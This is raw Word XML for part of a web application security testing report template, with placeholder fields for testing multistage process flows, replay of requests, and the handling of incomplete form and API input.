    <w:p w14:paraId="043692E1" w14:textId="77777777" w:rsidR="00501E5B" w:rsidRPr="00265938" w:rsidRDefault="00501E5B" w:rsidP="008E517A">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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271"/>
        <w:gridCol w:w="3735"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E91D62" w:rsidRPr="00E91D62" w14:paraId="442DB04B" w14:textId="77777777" w:rsidTr="0026593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033F330" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="002659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91D62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4052373" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="00E91D6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91D62" w:rsidRPr="00E91D62" w14:paraId="22793E0B" w14:textId="77777777" w:rsidTr="0026593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7D10BF5" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="002659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91D62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9C48043" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="00E91D6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91D62" w:rsidRPr="00E91D62" w14:paraId="03FEA94B" w14:textId="77777777" w:rsidTr="0026593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04DEC36" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="002659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91D62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86BA0A4" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="00E91D6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91D62" w:rsidRPr="00E91D62" w14:paraId="3EA7C975" w14:textId="77777777" w:rsidTr="0026593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BB1636F" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="002659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91D62">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Multistage Processes Tested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F407436" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="193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6B7221F" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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AA4C552" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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E32AE41" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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9540126" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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6BD13A8" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="00E91D6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91D62" w:rsidRPr="00E91D62" w14:paraId="6EDD3BEF" w14:textId="77777777" w:rsidTr="0026593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5E85489" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="002659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Calibri"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E91D62">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Sequence of </w:t>
            </w:r>
            <w:r w:rsidRPr="00E91D62">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Stages that can be accessed via a series of GET or POST Requests for distinct URLs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CFFED19" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="197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137D66A" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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6295D93" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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BF7ABAB" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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7818734" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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F2CA5B0" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="00E91D6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91D62" w:rsidRPr="00E91D62" w14:paraId="0197E370" w14:textId="77777777" w:rsidTr="0026593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851285A" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="002659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Calibri"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E91D62">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Multistage Process</w:t>
            </w:r>
            <w:r w:rsidRPr="00E91D62">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> that Involves different users Performing Operations on the Same Set of Data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C85C729" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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33627CA" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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FA15D8D" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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C8EDD03" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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FC1A06C" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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2340B07" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="00E91D6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91D62" w:rsidRPr="00E91D62" w14:paraId="6D42EE53" w14:textId="77777777" w:rsidTr="0026593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AFCF5A3" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="002659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Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E91D62">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Are Multistage Functions Accessed Out of Sequence?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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5683FAA" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="00E91D62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E91D62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73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B5F2CB4" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="00E91D62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E91D62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55470D" w:rsidRPr="00E91D62" w14:paraId="0A945E0C" w14:textId="77777777" w:rsidTr="0026593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C9F7F76" w14:textId="7C026117" w:rsidR="0055470D" w:rsidRPr="00E91D62" w:rsidRDefault="00C23EE4" w:rsidP="002659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Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C23EE4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Tested Attack Scenarios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50114CCE" w14:textId="77777777" w:rsidR="0055470D" w:rsidRPr="00C23EE4" w:rsidRDefault="00C23EE4" w:rsidP="0055470D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C23EE4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[*Skipping Stages, Replaying Requests, Revisiting Stages, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E9BDBEC" w14:textId="77777777" w:rsidR="00C23EE4" w:rsidRDefault="00C23EE4" w:rsidP="0055470D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  <w:p w14:paraId="4D38795A" w14:textId="67EDF4A2" w:rsidR="00C23EE4" w:rsidRPr="00E91D62" w:rsidRDefault="00C23EE4" w:rsidP="0055470D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DA1406" w:rsidRPr="00E91D62" w14:paraId="04ABDE52" w14:textId="77777777" w:rsidTr="0026593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553218B" w14:textId="0A343F0A" w:rsidR="00DA1406" w:rsidRPr="00C23EE4" w:rsidRDefault="00DA1406" w:rsidP="002659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Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA1406">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Impact of Skipping Stages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2BC9E3F7" w14:textId="77777777" w:rsidR="00DA1406" w:rsidRDefault="004A3BB2" w:rsidP="0055470D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Pr="004A3BB2">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Variables with Null/Uninitialized Values, Application Errors, etc.</w:t>
            </w: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2D703EFD" w14:textId="77777777" w:rsidR="004A3BB2" w:rsidRDefault="004A3BB2" w:rsidP="0055470D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413AB7D9" w14:textId="31F8A6E7" w:rsidR="004A3BB2" w:rsidRPr="00C23EE4" w:rsidRDefault="004A3BB2" w:rsidP="0055470D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4A3BB2" w:rsidRPr="00E91D62" w14:paraId="79408F5A" w14:textId="77777777" w:rsidTr="0026593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A62140F" w14:textId="7E74DD02" w:rsidR="004A3BB2" w:rsidRPr="00DA1406" w:rsidRDefault="004A3BB2" w:rsidP="002659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Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A3BB2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Revisiting Earlier Stages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73C65D52" w14:textId="77777777" w:rsidR="004A3BB2" w:rsidRDefault="00C6057F" w:rsidP="0055470D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Pr="00C6057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Yes/No, Application Behavior Observed</w:t>
            </w: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6D0E5525" w14:textId="77777777" w:rsidR="00C6057F" w:rsidRDefault="00C6057F" w:rsidP="0055470D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7FA85E8F" w14:textId="045CEA9D" w:rsidR="00C6057F" w:rsidRDefault="00C6057F" w:rsidP="0055470D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C6057F" w:rsidRPr="00E91D62" w14:paraId="50F7D4D7" w14:textId="77777777" w:rsidTr="0026593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3EFCAED" w14:textId="0CCEC3E3" w:rsidR="00C6057F" w:rsidRPr="004A3BB2" w:rsidRDefault="00C6057F" w:rsidP="002659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Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C6057F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Replay Attacks with Another User's Parameters?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6829D1AE" w14:textId="77777777" w:rsidR="00C6057F" w:rsidRDefault="00C6057F" w:rsidP="0055470D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Pr="00C6057F">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Successful/Unsuccessful, Details</w:t>
            </w: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5A6589A5" w14:textId="77777777" w:rsidR="00C6057F" w:rsidRDefault="00C6057F" w:rsidP="0055470D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3148CD46" w14:textId="1F7B45C3" w:rsidR="00C6057F" w:rsidRDefault="00C6057F" w:rsidP="0055470D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A2665A" w:rsidRPr="00E91D62" w14:paraId="5B5959EB" w14:textId="77777777" w:rsidTr="0026593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6AEB796" w14:textId="6D21D3F7" w:rsidR="00A2665A" w:rsidRPr="00C6057F" w:rsidRDefault="00A2665A" w:rsidP="002659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Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A2665A">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Error Messages or Debug Information Leaked?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12EB321E" w14:textId="77777777" w:rsidR="00A2665A" w:rsidRDefault="00A2665A" w:rsidP="0055470D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Pr="00A2665A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, List of Findings</w:t>
            </w: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4D4E9E89" w14:textId="77777777" w:rsidR="00A2665A" w:rsidRDefault="00A2665A" w:rsidP="0055470D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57C5D3C0" w14:textId="45C750E4" w:rsidR="00A2665A" w:rsidRDefault="00A2665A" w:rsidP="0055470D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E91D62" w:rsidRPr="00E91D62" w14:paraId="0AA5FA91" w14:textId="77777777" w:rsidTr="0026593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BBDC670" w14:textId="7CDAEBD4" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00986F57" w:rsidP="002659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Additional </w:t>
            </w:r>
            <w:r w:rsidR="00E91D62" w:rsidRPr="00E91D62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Test Results for Multistage Processes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A7279E5" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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4BB43C6" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="196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F23C6E3" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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A91E900" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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AA48CA0" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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5B3B7FA" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="00E91D6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2665A" w:rsidRPr="00E91D62" w14:paraId="0959763F" w14:textId="77777777" w:rsidTr="0026593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8559B1F" w14:textId="1F317C0B" w:rsidR="00A2665A" w:rsidRPr="00E91D62" w:rsidRDefault="000D2689" w:rsidP="002659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0D268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Potential Exploit Paths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25E8982" w14:textId="77777777" w:rsidR="00A2665A" w:rsidRPr="000D2689" w:rsidRDefault="000D2689" w:rsidP="00A2665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0D268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[*Bypassing Process Steps, Gaining Unauthorized Access, Logic Flaws, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29A0E25C" w14:textId="77777777" w:rsidR="000D2689" w:rsidRDefault="000D2689" w:rsidP="00A2665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72CB645" w14:textId="64BDDA7D" w:rsidR="000D2689" w:rsidRPr="00E91D62" w:rsidRDefault="000D2689" w:rsidP="00A2665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62D07" w:rsidRPr="00E91D62" w14:paraId="1FDDC006" w14:textId="77777777" w:rsidTr="0026593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232B9AE" w14:textId="31080573" w:rsidR="00B62D07" w:rsidRPr="000D2689" w:rsidRDefault="00B62D07" w:rsidP="002659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B62D0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7331809" w14:textId="77777777" w:rsidR="00B62D07" w:rsidRDefault="00B62D07" w:rsidP="00A2665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587D00" w:rsidRPr="00587D0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Inconsistent Application States, Improper Validation, Missing Access Controls, etc.</w:t>
            </w:r>
            <w:r w:rsidR="00587D0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070DC0F" w14:textId="77777777" w:rsidR="00587D00" w:rsidRDefault="00587D00" w:rsidP="00A2665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F0A0E91" w14:textId="4F9577E7" w:rsidR="00587D00" w:rsidRPr="000D2689" w:rsidRDefault="00587D00" w:rsidP="00A2665A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E91D62" w:rsidRPr="00E91D62" w14:paraId="1FBCFB19" w14:textId="77777777" w:rsidTr="0026593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C8A5330" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="002659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91D62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1A608FF" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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9B3C6B9" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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0DB87DD" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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0F81ABA" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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9262B90" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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861EC8F" w14:textId="77777777" w:rsidR="00E91D62" w:rsidRPr="00E91D62" w:rsidRDefault="00E91D62" w:rsidP="00E91D6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65938" w:rsidRPr="00E91D62" w14:paraId="7DF44562" w14:textId="77777777" w:rsidTr="00265938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4738E40" w14:textId="491A4063" w:rsidR="00265938" w:rsidRPr="00E91D62" w:rsidRDefault="00265938" w:rsidP="002659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Results Analysis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A0D211C" w14:textId="77777777" w:rsidR="00265938" w:rsidRDefault="00265938" w:rsidP="002659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954308F" w14:textId="77777777" w:rsidR="00265938" w:rsidRDefault="00265938" w:rsidP="002659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8EEC3D5" w14:textId="77777777" w:rsidR="00265938" w:rsidRDefault="00265938" w:rsidP="002659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02531CD" w14:textId="77777777" w:rsidR="00265938" w:rsidRPr="00E91D62" w:rsidRDefault="00265938" w:rsidP="0026593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7C2EC9C6" w14:textId="546B2578" w:rsidR="003C7C05" w:rsidRDefault="003C7C05" w:rsidP="008E517A">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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3C7C05" w:rsidRPr="00A51A96" w14:paraId="12D4CECF" w14:textId="77777777" w:rsidTr="00597FCE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="04036F63" w14:textId="53AB26E9" w:rsidR="003C7C05" w:rsidRPr="003C713F" w:rsidRDefault="003C7C05" w:rsidP="005232C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11.3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AB1DD4" w:rsidRPr="00AB1DD4">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test Handling of Incomplete Input</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="550FA649" w14:textId="77777777" w:rsidR="00BD0AC7" w:rsidRPr="00597FCE" w:rsidRDefault="00BD0AC7" w:rsidP="008E517A">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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1C3333" w:rsidRPr="001C3333" w14:paraId="0BAA435A" w14:textId="77777777" w:rsidTr="00597FC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D7605A3" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="001C3333" w:rsidP="00597F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C3333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23C3052D" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="001C3333" w:rsidP="001C333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C3333" w:rsidRPr="001C3333" w14:paraId="23B49325" w14:textId="77777777" w:rsidTr="00597FC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DE6896C" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="001C3333" w:rsidP="00597F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C3333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3032B0C7" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="001C3333" w:rsidP="001C333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C3333" w:rsidRPr="001C3333" w14:paraId="5EEF3FEE" w14:textId="77777777" w:rsidTr="00597FC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17DA58A" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="001C3333" w:rsidP="00597F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C3333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shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C449AB1" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="001C3333" w:rsidP="001C333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C3333" w:rsidRPr="001C3333" w14:paraId="5A31AC44" w14:textId="77777777" w:rsidTr="00597FC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B74802E" w14:textId="4B6B03FD" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="003740DE" w:rsidP="00597F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740DE">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Incomplete Form Data Submission Tested?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42D31D9D" w14:textId="77777777" w:rsidR="001C3333" w:rsidRPr="00F35B56" w:rsidRDefault="00F35B56" w:rsidP="003740D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F35B5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[*Yes/No, Client-Side &amp; Server-Side Validation Observed?]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="550C6554" w14:textId="77777777" w:rsidR="00F35B56" w:rsidRDefault="00F35B56" w:rsidP="003740D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67A613D" w14:textId="77777777" w:rsidR="00F35B56" w:rsidRDefault="00F35B56" w:rsidP="003740D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409E20C" w14:textId="00E45AF5" w:rsidR="00F35B56" w:rsidRPr="001C3333" w:rsidRDefault="00F35B56" w:rsidP="003740D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C3333" w:rsidRPr="001C3333" w14:paraId="580B7EA9" w14:textId="77777777" w:rsidTr="00597FCE">
        <w:trPr>
          <w:trHeight w:val="1070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EAA989A" w14:textId="0A2C07DF" w:rsidR="001C3333" w:rsidRPr="001C3333" w:rsidRDefault="00577879" w:rsidP="00597F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77879">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Manipulated Requests Sent?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="512ABAF7" w14:textId="77777777" w:rsidR="001C3333" w:rsidRDefault="00577879" w:rsidP="001C333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57787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[*Yes/No, Bypassed Validation? Yes/No, Server Response Observed?]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72615DE0" w14:textId="77777777" w:rsidR="007E699B" w:rsidRDefault="007E699B" w:rsidP="001C333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1AD1500" w14:textId="723BFB3C" w:rsidR="007E699B" w:rsidRPr="001C3333" w:rsidRDefault="007E699B" w:rsidP="001C333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492020" w:rsidRPr="001C3333" w14:paraId="56B12347" w14:textId="77777777" w:rsidTr="00597FCE">
        <w:trPr>
          <w:trHeight w:val="1268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BDF7AFA" w14:textId="1FBC4E4D" w:rsidR="00492020" w:rsidRPr="00577879" w:rsidRDefault="00492020" w:rsidP="00597F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92020">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Incomplete API Payloads Sent?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="677D8DAD" w14:textId="7B060752" w:rsidR="00492020" w:rsidRPr="00577879" w:rsidRDefault="00492020" w:rsidP="001C333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49202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JSON/XML Fields Omitted, Server Response Code &amp; Error Handling Observed?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DB1BCC" w:rsidRPr="001C3333" w14:paraId="77C7042D" w14:textId="77777777" w:rsidTr="00597FCE">
        <w:trPr>
          <w:trHeight w:val="1484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0CA5BD4" w14:textId="1303C8E0" w:rsidR="00DB1BCC" w:rsidRPr="00492020" w:rsidRDefault="00DB1BCC" w:rsidP="00597F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B1BCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Error Handling &amp; Debug Output Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E31CE60" w14:textId="159BEC5D" w:rsidR="00DB1BCC" w:rsidRDefault="00DB1BCC" w:rsidP="001C333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DB1BC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Stack Traces or Sensitive Data Leaked?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DB1BCC" w:rsidRPr="001C3333" w14:paraId="78063E7C" w14:textId="77777777" w:rsidTr="00597FCE">
        <w:trPr>
          <w:trHeight w:val="1421"/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163F00B" w14:textId="153E7790" w:rsidR="00DB1BCC" w:rsidRPr="00DB1BCC" w:rsidRDefault="001F5E9E" w:rsidP="00597F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F5E9E">
              <w:rPr>
